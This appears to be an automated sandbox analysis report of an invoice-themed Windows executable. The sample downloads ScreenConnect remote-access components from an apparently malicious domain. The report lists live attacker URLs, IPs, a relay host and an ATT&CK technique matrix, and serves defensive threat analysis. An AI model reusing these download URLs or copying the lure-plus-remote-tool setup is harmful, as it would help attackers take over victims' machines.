Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Search Order Hijacking	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	51 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Users	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Bootkit	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
E_BILL9926378035.exe	18%	ReversingLabs
E_BILL9926378035.exe	14%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
otohelp.top	3%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2.C:	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config	1%	Virustotal		Browse
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://otohelp.top/Bin/ScreenConnect.Windows.dll	1%	Virustotal		Browse
https://g.live.com/odclientsettings/Prod.C:	0%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.Client.dll	1%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.ClientService.dll	1%	Virustotal		Browse
http://www.xrml.org/schema/2001/11/xrml2coreS	0%	Virustotal		Browse
https://g.live.com/odclientsettings/ProdV2	0%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe	1%	Virustotal		Browse
http://www.w3.o	0%	Virustotal		Browse
http://otohelp.top	3%	Virustotal		Browse
https://otohelp.top	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.Client.manifest	1%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe	1%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.Client.applicationx	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	0%, Virustotal, Browse	unknown
otohelp.top	79.110.49.16	true	true	3%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown
mmf351.ddns.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Windows.dll	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Client.dll	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.ClientService.dll	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Client.manifest	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe	true		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe.config	true		unknown
https://otohelp.top/Bin/ScreenConnect.Core.dll	true		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config	true		unknown
https://otohelp.top/Bin/ScreenConnect.ClientService.exe	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configVK	dfsvc.exe, 00000001.00000002.2602490344.000001F6CE6EE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/?	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.Client.application-	dfsvc.exe, 00000001.00000002.2606271704.000001F6D010C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers?	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsClient.ex	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.application2m67Np37V	dfsvc.exe, 00000001.00000002.2608083269.000001F6D073A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.dll~	dfsvc.exe, 00000001.00000002.2608230916.000001F6D0761000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.5.dr	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstage	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.ClientService.dllF	dfsvc.exe, 00000001.00000002.2606271704.000001F6D010C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationtrue	ScreenConnect.WindowsClient.exe, 00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.typography.netD	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.5.dr	false	0%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.ClbhR	ScreenConnect.WindowsClient.exe, 00000009.00000002.1932966605.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.founder.com.cn/cn/cThe	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.5.dr	false	0%, Virustotal, Browse	unknown
http://www.xrml.org/schema/2001/11/xrml2coreS	dfsvc.exe, 00000001.00000002.2591740664.000001F6B5BA8000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationpplicati	ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.000000000104B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Wind	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.galapagosdesign.com/DPlease	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.w3.o	dfsvc.exe, 00000001.00000002.2591740664.000001F6B5F4E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Client.manifeston-y	dfsvc.exe, 00000001.00000002.2607141930.000001F6D01C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B62A7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D19000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fonts.com	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.Client.application~	dfsvc.exe, 00000001.00000002.2607979675.000001F6D0730000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://otohelp.top	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B62A7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B629F000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://www.zhongyicts.com.cn	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dfsvc.exe, 00000001.00000002.2591740664.000001F6B5B3A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1998757686.00000000020DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000005.00000003.1709894416.0000023332F42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationx	dfsvc.exe, 00000001.00000002.2591740664.000001F6B5E76000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.x	dfsvc.exe, 00000001.00000002.2591740664.000001F6B62A7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsCD	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application	ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, B3D7NWNK.log.1.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.application?e=	E_BILL9926378035.exe, 00000000.00000002.1842040994.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.application	dfsvc.exe, 00000001.00000002.2602490344.000001F6CE6EE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2607979675.000001F6D0730000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2607771724.000001F6D06F7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2607343170.000001F6D069B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2607141930.000001F6D01C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2606271704.000001F6D010C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1934992392.000000001B71D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933881909.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933881909.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1934964833.000000001B710000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933422520.000000000106D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.000000000104B000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.0000000001010000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.e	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.xrml.org/schema/2001/11/xrml2core	dfsvc.exe, 00000001.00000002.2591740664.000001F6B5BA8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.w3.or	dfsvc.exe, 00000001.00000002.2591740664.000001F6B5F4E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5E76000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5FE9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933422520.000000000106D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.ver)	svchost.exe, 00000005.00000002.2946009989.0000023333061000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&	B3D7NWNK.log.1.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationaliz	ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.000000000104B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationX	ScreenConnect.WindowsClient.exe, 00000009.00000002.1933881909.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config(	dfsvc.exe, 00000001.00000002.2609149253.000001F6D0879000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.carterandcone.coml	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bi	dfsvc.exe, 00000001.00000002.2608300536.000001F6D077A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationL	ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.000000000104B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/cabarga.htmlN	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationppDaq	ScreenConnect.WindowsClient.exe, 00000009.00000002.1934964833.000000001B710000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.founder.com.cn/cn	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsClient.exeuy	dfsvc.exe, 00000001.00000002.2607141930.000001F6D01C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/frere-user.html	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManag	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000005.00000003.1709894416.0000023332F42000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationC	dfsvc.exe, 00000001.00000002.2608128974.000001F6D0753000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Core.dll$	dfsvc.exe, 00000001.00000002.2608230916.000001F6D0761000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.jiyu-kobo.co.jp/	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll0.1.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.ex8	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/	dfsvc.exe, 00000001.00000002.2589434562.000001F6B40D7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers8	dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.Client.manifestR	dfsvc.exe, 00000001.00000002.2607343170.000001F6D069B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.ClientSe	dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.application2	ScreenConnect.WindowsClient.exe, 00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configjK	dfsvc.exe, 00000001.00000002.2602490344.000001F6CE6EE000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.110.49.16	otohelp.top	Germany		57287	OTAVANET-ASCZ	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523877
Start date and time:	2024-10-02 06:21:52 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	E_BILL9926378035.exe
Detection:	MAL
Classification:	mal69.troj.evad.winEXE@17/74@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 59% Number of executed functions: 305 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 184.28.90.27, 20.42.73.29, 199.232.210.172
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7736 because it is empty
Execution Graph export aborted for target ScreenConnect.WindowsClient.exe, PID 7828 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:22:45	API Interceptor	256066x Sleep call for process: dfsvc.exe modified
00:22:46	API Interceptor	2x Sleep call for process: svchost.exe modified
00:22:46	API Interceptor	1x Sleep call for process: E_BILL9926378035.exe modified
00:22:59	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
79.110.49.16	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse
	D3NM6xht1m.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
